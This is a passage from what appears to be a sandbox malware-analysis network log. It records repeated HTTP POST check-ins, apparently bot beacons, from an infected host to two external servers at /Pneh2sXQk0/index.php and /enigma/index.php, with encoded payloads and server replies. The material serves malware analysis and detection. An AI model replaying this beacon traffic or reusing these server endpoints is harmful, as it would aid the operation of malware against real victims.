                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:59.159167051 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1529192.168.2.551385193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:59.408163071 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:59.657711983 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1530192.168.2.551386193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:59.447603941 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:59.693651915 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1531192.168.2.551387193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:59.945117950 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:00.196602106 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1532192.168.2.551388193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:59.974358082 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:00.217288971 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1533192.168.2.551389193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:00.469324112 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:00.721677065 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1534192.168.2.551390193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:00.527087927 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:00.775468111 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1535192.168.2.551391193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.028166056 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.278172970 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1536192.168.2.551392193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.039562941 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.285864115 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1537192.168.2.551393193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.539577961 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.788717985 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1538192.168.2.551394193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.611449003 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.865340948 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1539192.168.2.551395193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.111525059 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.358840942 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1540192.168.2.551396193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.113893032 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.354775906 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1541192.168.2.551397193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.608176947 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.861437082 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1542192.168.2.551398193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.701699972 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.951081991 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1543192.168.2.551399193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.178983927 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.424249887 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1544192.168.2.551400193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.198858976 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.447966099 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1545192.168.2.551401193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.683476925 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
